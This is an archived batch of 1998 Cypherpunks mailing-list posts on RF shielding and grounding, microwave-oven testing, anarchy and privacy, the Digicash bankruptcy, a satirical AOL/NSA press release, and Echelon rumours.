Message-ID: <v04102705b267c21df0d4@[141.142.103.240]>
MIME-Version: 1.0
Content-Type: text/plain



>
>Please explain to me why it matters that the box be grounded!
>
>Radiated energy from chips and traces is independent of your mongo
>ground strap to the mother ship. All the strap does is alter the DC
>potential. Shield your box well but design out the leg irons and the
>geological requirements.
>
>

Please explain how you can sheild something without grounding it.  Doesn't 
the energy need some place to go?




Matt <mailto:melliott@itmail.ncsa.uiuc.edu>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 05:52:46 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: TEMPEST laptops (fwd)
Message-ID: <199811052117.PAA14255@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 5 Nov 1998 11:56:20 -0500
> From: Petro <petro@playboy.com>
> Subject: Re: TEMPEST laptops (fwd)

> >It depends on the frequency. Last time I checked a laser or a maser (both
> >are radio waves strictly speaking) travel LOS. The scattering comes from
> >beam divergence and incidental refractions and reflections from the
> >molecules in the air and supported detritus.
> 
> 	And both Lasers and Masers scatter under certain conditions. If you
> can see the laser, it is scattering a bit of [energy light photons]

All EM radiation scatters *IF* the wavelength of the signal is comparable
to the wavelength of the particulate. If the particulate is less than about
1/3 wavelength it won't significantly scatter.

The reason that dust in the air scatters lasers (and masers don't have this
problem because the wavelength is too long) is that the particles are
significantly larger than the wavelenght of the signal. It is directly
analogous to moon-shine. In astronomy this is related to something called
the Poynting Effect.

This is also the reason that IR radiation goes through smoke and fog while
visible light won't. Raleigh Scattering is the reason that the fog appears
white.

In photography and radar mapping this is what limits the resolution of the
bounced signal as well.

You can build an experiment to demonstrate this with peg-board, pegs, and
some rope. Lay the peg-board on a table. Place a peg on one edge and connect
the rope. then along the line of the rope place other pegs at equal but
different distances and try to get a transverse plane wave to travel down
the rope. Note the relative wavelenght of the wave in the rope to the
spacing of the pegs. It takes practice to get it to work correctly so don't
give up to easy.

> 	I was under the (apparently false) impression that things like
> animal bodies, and ordinary building materials (like wood, Lathe &
> plaster/drywall) wouldn't stop or significantly bounce the beams back the
> way you didn't want them to go.

Depends on the material, angle of incidence, water content, frequency of the
signal, transmissivity of the material at that frequency, etc.

In the 10cm radar (used by tanks and ground troops to find each other) even
leaves will bounce a signal.

> 	I was thinking more of controling the direction of the RF, rather
> than trying to completely supress it.

Exaclty. The issue then is what do we do with the signal once we've got it
directed where we want it. For EM signals we want to get them to a ground
plane so they go away and don't exist anymore.

If it doesn't exist anymore you can't very well tap it.

> 	We're not cooking Hotdogs here, and we aren't using (for the most
> part) microwaves. Yes, you can heat a hotdog on a PII, but that is more
> from heat radiation than RF.
> 
> 	Microwave ovens also leak RF.

True enough, but the physics are applicable. Don't confuse cause with
effect.

As to microwave ovens leaking, yes but they leak orders of magnitude less
which makes them orders of magnitude harder to detect. That is the point to
TEMPEST after all, take advantage of the 1/r^2 law so the mallet has to be
sitting right in your lap to get a good field strength.



    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 6 Nov 1998 08:08:48 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: Grounding
Message-ID: <364233E1.13BB@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim,

I really have to disagree about shielding and leakage.

***
Electricity runs from a high-potential point to ground. If it isn't
grounded
it radiates away into space where it can be detected. If the Faraday
Cage
isn't grounded it simply acts as a parasitic oscillator and re-emits the
signal from inside, though at a lower amplitude. Remember, charge rests
on
the *OUTSIDE* of a object so that any charge picked up internaly gets
passed
to the outside surface.
***

Consider a battery-powered spark gap inside a copper box. Lots of
beautiful wideband noise. I refuse to ground my copper box. I'm going to
suspend it from a weather balloon over Menwith Hill. 

The solutions to the wave equation inside the cavity have a real part ~0
in the exponent. The boundary condition at the inside surface of the
copper box splices together the solutions in the cavity and inside the
conductor. Which solutions, BTW, have a real component that is non-zero
so the waves are of exponentially decreasing amplitude the further into
the Cu you go ( skin depth, power loss ). 

At the inside boundary, the higher the conductivity the smaller the E
field at the surface, the shallower the skin depth and the more power is
reflected with less loss.

The amplitude of the internal Cu ( exponentially decreasing ) solutions
at the outside surface determines the extent to which the wave leaks out
because the solution is imaginary again outside. 

If it helps, the solution looks like the Schroedinger equation solution
for a particle in a potential well when at least one boundary is a
region of finite potential.

Leakage has nothing to do with being grounded since the wave can be
generated without the total charge residing on the surface of the box (
DC potential ) changing at all. What's there just moves around a little,
that's all.

I don't think it takes a whole lot of copper to do the job: the skin
depth is pretty small. A copper screen behaves much like the copper
sheet execept that it deviates as the wavelengths become closer to the
dimensions of the holes. You might say that the resistivity increases
with frequency. It leaks more.

**
The 1st rule of electrons:
 They always take the shortest path to ground.
Corollary:
 If they can't get to ground they radiate their excess energy away as
 photons.
***
Oh, for crying out loud! Where did this stuff come from?

I prefer the three laws of thermodynamics in layman's terms:
i)   You can't get something for nothing
ii)  The best you can do is break even
iii) You can't even do that

Works for my checking account too.

Regards,
Mike

BTW - I'm still at a loss to understand what the geology has to do with
RF shielding. Chaff, I think.

BTW^2 - The more conductive the TARMAC the more clutter you'll get
because it will be a better reflector. Ground or not. The incident waves
*don't care*.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 06:00:48 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: How to test *your* microwave oven distribution pattern. (fwd)
Message-ID: <199811052126.PAA14347@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 05 Nov 1998 13:09:09 -0800
> From: David Honig <honig@sprynet.com>
> Subject: Re: How to test *your* microwave oven distribution pattern.

> At 08:47 AM 11/5/98 -0600, Jim Choate wrote:
> >Here's a simple way to test the bounce-pattern of your micro-wave oven:
> 
> Simpler: stick a neon-bulb with the leads twisted off into the oven.
> Watch the glow vary. Put a cup of water in there since you're not supposed
> to run empty.

Yes, but they don't give you as easily measured level of the incident
radiation.

with a neon bulb or a flourescent tube (what I prefer) you have a hard time
mapping radiation level to brightness with commenly available photometers.
Photo quality stuff isn't nearly accurate enough.

> > -	Make sure the stake is in suitable ground without lots of quartz
> >        and other similar peizo-electric materials.
> 
> Not piezo (though quartz is), but non conductive.  You have to 
> tap the groundwater table.  Sand, granite don't conduct.

Sand has lots of piezo. You don't want piezo because the ground pressure on
the stake will cause excessive noise.

As to non-conductive, you *WANT* it to be conductive otherwise the signals
will form ground waves and propogate horizontaly. You can see this with
radar signals from aircraft that bounce off the tarmac (I used to live next
to the Austin airport and had access to a spectrum analyzer).

If the ground plane isn't conductive it isn't a ground plane.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Fri, 6 Nov 1998 06:46:59 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone (fwd)
Message-ID: <199811052212.QAA14923@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Thu, 5 Nov 1998 10:43:40 -0500
> From: Petro <petro@playboy.com>
> Subject: RE: dbts: Privacy Fetishes, Perfect Competition, and the Foregone
>  (fwd)

> 	Anarchy is usually defined as the absense of government. What
> exactly makes up a "government", what are it's defining characteristics?

Well let's see....

control over some geographic area

arbitration of conflict

tithe from the inhabitants of that area

regulation of economic systems by controlling the medium of trade (ie money)

> 	Simply a device for reallocating wealth?--Insufficient, there are
> lots of mechanisms for that.

No, government control economies that's not the same thing as having
re-allocation of wealth as a goal. That's more a responsbility of a business
than a government. Governments, at least in principle, are concerned with
stable economies and the continued existance of same. Who exactly, if
anyone, is holder of that wealth is in principle irrelevant to the
definition of political systems as a general expression of human psychology.

Though it is clear the devil is in the details.

> 	A body that lays down standards and rules of conduct?--Sounds like
> a church or industry consortium to me.

It sounds like an expression of the social aspects of human psychology.
Whether it's a church, industry consortium, local LEA, local fire dept.,
etc.

> 	A heirarchical (sp?) structure that uses fear, propaganda and force
> to reallocate wealth, enforce standards and rules of conduct, and other
> things at whim (for varying values of "whim", from the "whim" of a
> dictator, to the "whim" of the "body politic").

Who cares whether it's heirarchical or flat (as in an anarchy or
free-market). The point is that abuse takes place.

It is no more ethical to bash somebodies brains in under an anarchy than it
is in a democracy or a communicsm.

> 	Now, THAT is a government. Yes, some of what it enforces is
> probably a good idea (i.e. everyone driving on the same side of the road,
> &etc) some if it is kinda silly (don't smoke dope, or you're going to jail
> (Here, have a beer)), and some of it is downright stupid and shortsighted
> (encryption policy, not drinking beer out of a bucket on the sidewalk).

Sounds like an expression of the range of human beliefs. Whether something
is right, wrong, stupid, etc. is a function of individual statements of
importance and ranking of consequences.

> 	Anarchy is not having to be effected by that, being "free" to
> follow what one thinks is right.

Which unfortunately includes the neighbor being able to take your property
by force since he believes it's right.

> How one gets to that state is not really
> relevent.

Tell that to the mother of the kid who got killed last night because he had
something somebody else wanted. Also explain to here how under an anarchy
there isn't any recourse for her other than to try to find that person
herself and kill them....

Yep, that is a very efficient and ethical system you wanna build.

 My statement above simply lays out the position having Privacy
> (for large enough values of privacy to be meaningful) and Freedom (for
> large enough values of Freedom to be meaningful) one is effectively in an
> anarchistic state. That is what "close enough to be meaningful" meant.

Freedom is the right to do what you want *WITHOUT* impinging or otherwise
limiting others right to express their desires and wants.

Anarchy clearly won't do that.

> 	Privacy is (at least it's my understanding) the ability to hide or
> mask   information in such a way that only people you wish to have access
> to it do.

If privacy exists you don't have to hide things because nobodies looking in
the first place.

You only need to hide things if you're reasonably certain somebody else
wants it.

> 	There are varying degrees of Privacy, from "Well, at least they

Yep, like there are varying degrees of pregnancy. Either somebody is looking
or they aren't.

> don't analyize what's in my feeces, even if they do watch me take it" to
> being able to completely hide any information at all from anyone.

No, that is varying degrees of *respect* for privacy. Not the same animal at
all.

> 	Freedom is the ability to make choices, and exercise those choices.

Without impinging on others freedom.

It's worth noting that anarchist don't add that last one in there because it
blows their whole little house of cards completely away.

> 	Just like privacy, there are varying degrees of freedom, from the
> convict who can chose wheter he/she wants to eat that slop or go hungry, to
> the president of the US who can (apparently) bomb people with impunity, lie
> under oath & etc.

No, there are varying degrees of respect for freedom.

> 	When the amount of freedom and privacy is high enough, it is
> indistinguishable from anarchy.

Sure it is, because under anarchy there is no protection that one persons
expression won't interfere with anothers expression without resorting to
violence.


    ____________________________________________________________________
 
       To know what is right and not to do it is the worst cowardice.

                                                     Confucius

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart van Moorsel <bartvmoorsel@kivi.nl>
Date: Fri, 6 Nov 1998 00:09:19 +0800
To: "cypherpunks@toad.com>
Subject: How to save a real audio stream?
Message-ID: <3641C1C5.9AF5A93C@kivi.nl>
MIME-Version: 1.0
Content-Type: text/plain



Can anybody explain how to save a real audio stream? I think I saw this
question before, sorry to ask for a replay.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 06:55:19 +0800
To: dcsb@ai.mit.edu
Subject: FYI:  Digicash bankruptcy
Message-ID: <v04020a17b267c6f85c06@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


X-Sender: "Nahum.array" <nahum.array@csci.ca>
Date: Thu, 05 Nov 1998 14:32:51 -0500
To: ibc-forum@ARRAYdev.com
From: Nahum Goldmann <Nahum.Goldmann@ARRAYdev.com>
Subject: FYI:  Digicash bankruptcy
Mime-Version: 1.0

I believe this kind of information is invaluable.  Personally, I do not
subscribe to Agre's doom and gloom.  For years I'm saying that there is a
very little "i" and a very large "C" in iCommerce.

Chaum might be many bright things but an entrepreneur he definitely ain't.
But than it's quite difficult in this new paradigm for all of us.

Of course, Bob Hettinga could have saved quite a lot of energy and avoid
much disappointment if he did pay for that my trip to Antigua.  I always
believe that unpaid advice is not listened to, and here is a good prove of
this concept.

Have fun.  I'm sure it will come.  Eventually.

Nahum Goldmann
ARRAY Development
http://www.ARRAYdev.com

=======================================================

Date: Thu, 5 Nov 1998 10:36:52 -0800 (PST)
From: Phil Agre <pagre@alpha.oac.ucla.edu>
To: "Red Rock Eater News Service" <rre@lists.gseis.ucla.edu>
Subject: [RRE]Digicash bankruptcy
Sender: <rre@lists.gseis.ucla.edu>
List-Software: LetterRip Pro 3.0.2 by Fog City Software, Inc.
List-Subscribe: <mailto:rre-on@lists.gseis.ucla.edu>
List-Unsubscribe: <mailto:rre-off@lists.gseis.ucla.edu>

[With the bankruptcy of Digicash, it is time to assemble the definitive
list of underperforming Internet technologies.  The received wisdom is
that the Internet lies at the vortex of a historically unprecedented era
of intensive and disruptive technological change.  A sober reading of the
evidence, however, supports something much closer to the opposite thesis,
viz, the Internet is a modest and useful new tool that, despite itself,
has given rise to an astonishingly wasteful mania whereby perfectly
good capital is plowed into one ill-conceived technology after another.
Consider: interactive television, VRML, Active X, network computers,
"push" technology, agents, "social" interfaces, resource visualization,
cryptographic payment mechanisms (aka "electronic commerce"), and others
that I hope you'll remind me about.  Each of these has been the object
of a frenzy that has compelled all manner of smart people, and a whole
lot of dumb ones such as myself, to say things like, "boy oh boy, the
world is going to be completely different a year from now".  This has
been going on continuously since the PR hype that accompanied the run-up
to the (failed) Communications Act of 1994 and then the (passed but then
catastrophically failed) Communications Act of 1996.  It has been fanned
by Wired magazine, whose capitulation to Conde Nast has ended an era that
should never have begun, and now it is marked by the bankruptcy of David
Chaum's Digicash.  All right-thinking people were in favor of Digicash,
whose technologies were as intellectually elegant as they were socially
responsible.  The problem is that the Digicash people were living in the
world of Alice and Bob -- a place where a mathematical proof can change
the world in perfect defiance of the dynamics (if you can call them that)
of large, highly integrated institutions.  Like many Internet-related
startups, Digicash existed only to the precise extent that the press was
writing about it, and now it doesn't exist at all.  So right now would
be an excellent time for us to renounce the false idea that we are living
in a time of unprecedented technical change.  Yes, the Web has been going
through a period of exponential growth.  But no, that growth is not at
all unprecedented, and in fact it is running behind the penetration rates
that earlier technologies such as the radio and gas cooking achieved once
they started being adopted on a mass scale.  (See, for example, Ronald C.
Tobey's scholarly and absorbing "Technology As Freedom: The New Deal and
the Electrical Modernization of the American Home", Univ. of California
Press, 1996.)  Nor has the underlying Internet changed at all quickly.
The Internet protocols that we use today are unchanged in their essentials
from about 1982.  In fact, once the real history of this era is written,
I think that 1982 will shape up as the true annus mirabilis, and 1994 will
simply be seen as the era when the innovations of ten to fifteen years
earlier finally caught public attention and reached the price point that
was needed to achieve the network externalities required for its large-
scale adoption.  If we get out the rake and drag away all of the detritus
of the underperforming technologies that I listed above, and compare our
times on an apples-for-apples basis with other periods of technological
innovation -- including the Depression era, for heaven's sake -- then I
think we will have a much healthier perspective going forward.  As it is,
people the world over have been propagandized into a state of panic, one
that encourages them to abandon all of their experience and common sense
and buy lots of computer equipment so that they will not be scorned by
their children and left behind by the apocalypse that is supposedly going
to arrive any day now.  No such apocalypse is going to occur, and all of
the TV preachers who have been announcing this apocalypse should apologize
and give the people their money back.  Yes, the world is going to change.
Yes, information technology will participate, and is already participating,
in a significant overhaul of the workings of most major social institutions.
But no, those changes are not going to happen overnight.  The sad line-up
of underperforming technologies should be understood not as serious attempts
at innovation but as a kind of ritual, an expensive and counterproductive
substitute for the chants and dances that healthy societies perform when
they are placed under stress.  Maybe once we get some healthy rituals for
contending with technological change ourselves, we will be able to snap out
of our trance, cast off the ridiculous hopes and fears of an artificially
induced millennium, and take up the serious work of discussing, organizing,
and contesting the major choices about our institutions that lie ahead.]

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
This message was forwarded through the Red Rock Eater News Service (RRE).
Send any replies to the original author, listed in the From: field below.
You are welcome to send the message along to others but please do not use
the "redirect" command.  For information on RRE, including instructions
for (un)subscribing, see http://dlis.gseis.ucla.edu/people/pagre/rre.html
or send a message to requests@lists.gseis.ucla.edu with Subject: info rre
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

Date: Wed, 4 Nov 1998 18:02:08 -0500
From: Robert Hettinga <rah@shipwright.com>
To: Digital Bearer Settlement List <dbs@philodox.com>, dcsb@ai.mit.edu,
        e$@vmeng.com, cryptography@c2.net, cypherpunks@cyberpass.net
Subject: Re: DigiCash Inc. to File Reorganization, Seeks Partners to Drive
eCash Forward

-----BEGIN PGP SIGNED MESSAGE-----


Okay.

Contrary to my own previous -- and painfully recent -- opinions on the matter,
Digicash, Inc., is, more or less, in play again, or it will be if there is
enough money chasing it. Whatever "enough" means.

Putting on my Gordon Gekko hat, here, I'm interested in finding out a few
things. Yes, I have seen the greater fool theory of the blind signature patent
operate more than a few times, but I am, nonetheless, driven to think about
this, and I might as well be public in my musing, at least for the time being.


For expenses of any new company, it should be pretty clear by now what I would
do with the DigiCash technology portfolio. I would put a real good
intellectual property lawyer on the payroll, keep the cryptographers who would
still consent to stick around, keep or improve whatever software test people
they have left, and do nothing but sell licenses and implementation
certifications, using the the underwiting model at
<http://www.philodox.com/modelpaper.html> as a roadmap.

For this imaginary company's revenue, aside from direct fees for validating a
developer's, and possibly an underwriter's, implementation of the protocol,
the trustee would be the only point of patent royalty collection and payment
from the underwriters and developers to the new patent holder.

As far as the current installed base is concerned, I would probably spin off a
company to support those customers, and give it a non-exclusive license as if
it were any other developer.

This assumes, of course, that DigiCash BV/Inc. didn't issue
exclusive-by-country licenses. While it appears on the surface that they have
done exactly this, I have been met with what seems like incredulity from
various DigiCash folks when I talk about it, so, for the time being, I'll take
them at their word when they tell me it isn't so. Actually, when I think about
it, it may be immaterial, as there are lots of countries on the internet to
park underwriters and trustees in, and they can denominate their bearer cash
instruments in any currency they want.

One way or another, the software side of DigiCash would be gone. We figure out
what the net present value is of the current licenses, and hope that a company
can be formed around that cashflow and spun off into a separate software
development company. If we're lucky, we make money on the spinoff and keep the
patent. If we're not lucky, DigiCash will probably have to get rid of it's
current obligations before *anyone* clueful would step in to pick up the
patents, and just the patents, alone.


Obviously, what has been spent so far building DigiCash, BV or Inc., is
immaterial to any discussion of the future. Just like what happened to Chaum,
et. al., when Negroponte and companies um, executed, the purchase of last
version of DigiCash, we have to completely forget the all the money which
has been spent on Digicash BV, now Digicash Inc., so far, and ignore the
howls of the current investors, as painful as that may be to listen to. :-).
They knew the job was dangerous when they took it, anyway...


Okay, that's a nice story. How about some actual data? I expect the best way
to get a handle of royalties is to start soliciting actual projected royalty
estimates from potential developers and underwriters, but, frankly, I think
that most developers and underwriters, like the rest of us, have no real idea
how much money they're going to make. Nonetheless, if anyone's interested in
telling me, offline, what they think they would would be fair royalty
payments, either as an underwriter or as a developer, I'd like to hear their
estimates. My PGP key is attached.

My own rule of thumb, for cash anyway, is that an underwriter can probably
charge no more than a bank charges to one of their non-customer ATM
transactions. That's probably no more than $3.00 a withdrawl. They also get to
keep the interest on the reserve account, if any, of course. Frankly, if the
royalties are low enough, that may be more than enough revenue to bootstrap a
business with, and   I would personally lobby for as low a royalty structure
as possible. That, of course, is driven entirely by the cost/revenue picture,
but it might be that a majority of the short-term operations can be
bootstrapped out of validation fees.


That leaves all the other potential markets for blind-signature macroscale
digital bearer settlement, everything from long-duration bandwidth purchases
for IP or voice dialtone on up to actual securities transactions themselves.
Most of these potential applications will occur after the patents expire,
but whoever owns these patents should allow not only licenses to all comers,
but, more to the point, should allow all *licensees* to worry about the
legal ramafications of the patents' use.

If a particular licensee can find a legal jurisdiction to offer utterly
anonymous digital bearer instruments backed by totally anonymous reserves,
then, as long as the licensee pays up, god bless 'em. The patents should be
licensed within the law, certainly, but, other than that, their use should be
considered value neutral, like all technology. As in all bearer markets
before them, the digital bearer trustee will be the point of maximum legal
compliance, and, as such, will be the functional "policeman" of the system.  I
leave the interesting solution of bearer-backed trustees for some other day,
probably after the patents have long expired.


Okay. There's lots more to talk about, of course, but I'm kind of tapped out
on this for the time being.

If you're an intellectual property lawyer, and you fancy yourself running the
DigiCash patent portfolio, contact me directly. I'm not sure exactly what I
can do, if anything, but I'd be very interested to hear your thoughts on this,
as the potential core person of this as yet imaginary enterprize, up to, and
including what it would cost for you to sign on for this much fun as at least
in-house counsel, if not the actual CEO. :-).

In addition, if someone has a reasonable non-proprietary(!) estimate of the
projected revenues on all those outstanding ecash contracts, that would be
nice to know as well. The terms of those contracts, are, of course, probably
unknowable at the moment, at least until someone has enough known scratch to
belly up to the table, sign an NDA and take a peek. Of course, then they
couldn't tell us anything anyway...

Isn't this fun?



Cheers,
Bob Hettinga

[Public keys ommitted]
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'


--------------160D55EEEBD38D036F141A24--

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Motyka <mmotyka@lsil.com>
Date: Fri, 6 Nov 1998 08:58:07 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: Re: How to test *your* microwave oven distribution pattern.
Message-ID: <364241B5.408B@lsil.com>
MIME-Version: 1.0
Content-Type: text/plain



Matt,

> Please explain how you can sheild something without grounding it.
> Doesn't the energy need some place to go?
>
Wrong metaphor for RF energy. It's not water. A ground is not a storm
drain.

Imagine two conductive spheres ( earth and moon ? ) and an RF generator
in a box sitting *peacefully* in space. Classical 3-body problem. The DC
potential that exists between any of them has absolutley no effect on a
wave travelling anywhere ( unless you want to get into the topic of
nonlinear materials ). So forget about everything in the scene except
that generator in the box. Shielding consists solely of preventing the
wave from getting out of the box into free space where it can be
detected. There is nothing special about *any* of the DC references.

Earth may be special ( source of women and beer ) but not to a wave.

Besides, chaining my laptop to a giant copper spike in a geologically
suitable region is out of the question. Just shielding it would make an
already heavy ThinkPad into a main battle tank.

Mike




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Fri, 6 Nov 1998 06:19:55 +0800
To: cypherpunks@toad.com
Subject: Re: US Cyberthreat Policy
In-Reply-To: <199811051449.JAA12327@camel8.mindspring.com>
Message-ID: <Pine.SOL.4.05.9811051631520.2654-100000@ultra1-100lez.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Kenneth A. Minihan and George J. Tenet Elected to America Online, Inc.
Board of Directors
New Board Members Hail From NSA and CIA 

DULLES, VA /DenounceNewswire/ -- 5 November 1998 -- America Online, Inc. 
announced today Lieutenant General Kenneth A. Minihan, Director of the 
National Security Agency and Chief of the Central Security Service, and 
George J. Tenet, Director of the Central Intelligence Agency, have been 
elected to its Board of Directors. AOL now boasts a board that includes 
the former head of the Joint Chiefs of Staff, Colin Powell; a former 
Nixon aide General Alexander Haig; and two distingished leaders of the 
U.S. intelligence community. 

"I am proud today to announce the election of Lieutenant General Kenneth 
Minihan and George Tenet to America Online's Board of Directors. Both of 
them possess records of proven leadership and commitment to public 
service that will be invaluable to our company as we work to build our 
business and the interactive medium into the next millennium," said 
Steve Case, Chairman and CEO of America Online, Inc. 

Mr. Case added: "Lieutenant General Minihan's record of service to our 
country, both in the military and in his current work with the NSA, is 
without equal in our times. His commitment to America's security and our 
country's future fits squarely with AOL's determination to build an 
online medium that dominates people's lives -- helping us to learn, to 
organize their lives, and even to engage more fully in the political 
process." 

Mr. Case continued: "George Tenet is a visionary leader in both the 
world of intelligence-gathering and the mass marketplace. He has played 
key roles in landmark achievements for our society. His expertise in the 
world of cloak and dagger will serve AOL in meeting the critical 
challenges facing the Company and in fulfilling our commitment to build 
a medium that threatens society as no other before."

Mr. Case wasn't done yet, adding further: "We look forward to working 
with the NSA and the CIA as we migrate the AOL network over to complete 
ECHELON compatibility with the next six months." ECHELON is the 
government's secret worldwide network that monitors all voice, data, 
fax, video, satellite, and digital communications in every country, 
recording, indexing, and collating every utterance made between every 
man, woman, child, business, or other organization, as well as between 
any two computer systems anywhere. 

"The perception that the Internet can change and improve peoples' lives 
and to reconnect them to their community is powerful and extraordinary," 
said Lt. General Minihan. "I'm honored to serve on the Board of a 
company that has been leading the way in creating such a perception in 
the public's mind, and leading the way to shaping a medium that that 
will open new doors of opportunity for our national security state." 

"In the next few years, public policy discussions in Washington and 
around the world will have as much to do with the development and 
ultimate impact of the Internet as any technological advance," said Mr. 
Tenet. "I look forward to serving a Company that is at the center of 
these policy discussions and is playing a large role in determining the 
success -- or failure -- of people around the world." 

source: http://www.denounce.com/nsaol.html


Regards,
- -- 
Ken Williams

Packet Storm Security http://www.Genocide2600.com/~tattooman/index.shtml
E.H.A.P. Corporation  http://www.ehap.org/  ehap@ehap.org info@ehap.org
NCSU Comp Sci Dept    http://www.csc.ncsu.edu/ jkwilli2@adm.csc.ncsu.edu
PGP DSS/DH/RSA Keys   http://www4.ncsu.edu/~jkwilli2/pgpkey/

________________________________________________________     
Get Private, Free, Encrypted Email at http://www.nsa.gov

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNkIac5Dw1ZsNz1IXAQHwIAf/ZWpQQvvwJiA2ANEuvUl9+WBC8HbrX2Hc
I4a3ZH4KKRJA/lUndaCOxvvkMe6R2vwdI92dTnI6GiKx9QAOfkwPeb4Cw+xAFsgJ
DRv0rrw3g8LTK+U+dM6xQsW1Sl1w1CVzSPc8Urh87d587Sd6/IDdDDIMHrsXlxPp
xxg+fNbbQE2bvUpd0+Nxo2gC8JpQGTq6YighXTufxLiFEr1xDU7FO7T6V22p2oMB
u32p/SLh16AG2aQRVI8z5hIsybIXVfCFc5dWTdaV43vuJE6yyteLDDtttPwTBeJS
6SCu5j6d5PnkdvbDN7+1zy7wMPkyktMyv4ewkGF5QEj2UpPg2bCKHw==
=yO91
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Fri, 6 Nov 1998 06:31:19 +0800
To: cypherpunks@cyberpass.net
Subject: Holloween II: Microsoft Plugs Linux
Message-ID: <v04020a19b267d03a89c2@[139.167.130.246]>
MIME-Version: 1.0
Content-Type: text/plain



http://www.opensource.org/halloween2.html is a more extensive, (positively
glowing) freshly smuggled (planted?) internal analysis of Linux by
Microsoft.

103k, but definitely worth reading.

Cheers,
Bob Hettinga
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 6 Nov 1998 07:48:11 +0800
To: cypherpunks@toad.com
Subject: Re: Project 415
Message-ID: <199811052256.RAA03477@camel8.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



Duncan Campbell says he doubts the Paul Dore
story has anything to do with P415/Echelon, which
is a collection system not a satellite. Moreover, the
description of a "deep space" satellite does not fit
the the known parameters of those that gather 
intelligence. Might be a completely new type but that's
a stretch.

One article Anonymous posted says Paul Dore denies 
having anything to do with the Web page we cited here 
as having been removed.

Another says the SETI people are pissed about the incident, 
one saying it has set SETI's credibility back "by a 100 years."

Still unexplained is the reason for the now 11,000 downloads
of Duncan's 1988 article on P451/Echelon in the last 36 hours. 
Could be an alien bot, pissed at being awakened by SETI 
putzes' screen savers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark Lanett" <mlanett@meer.net>
Date: Fri, 6 Nov 1998 10:32:48 +0800
To: <cypherpunks@cyberpass.net>
Subject: Re: Holloween II: Microsoft Plugs Linux
Message-ID: <003f01be092a$5ee1b800$692856cf@frohike.novita.com>
MIME-Version: 1.0
Content-Type: text/plain



From: Anonymous <nobody@replay.com>
>   By the standards of the ... developer accustomed to VB [Visual
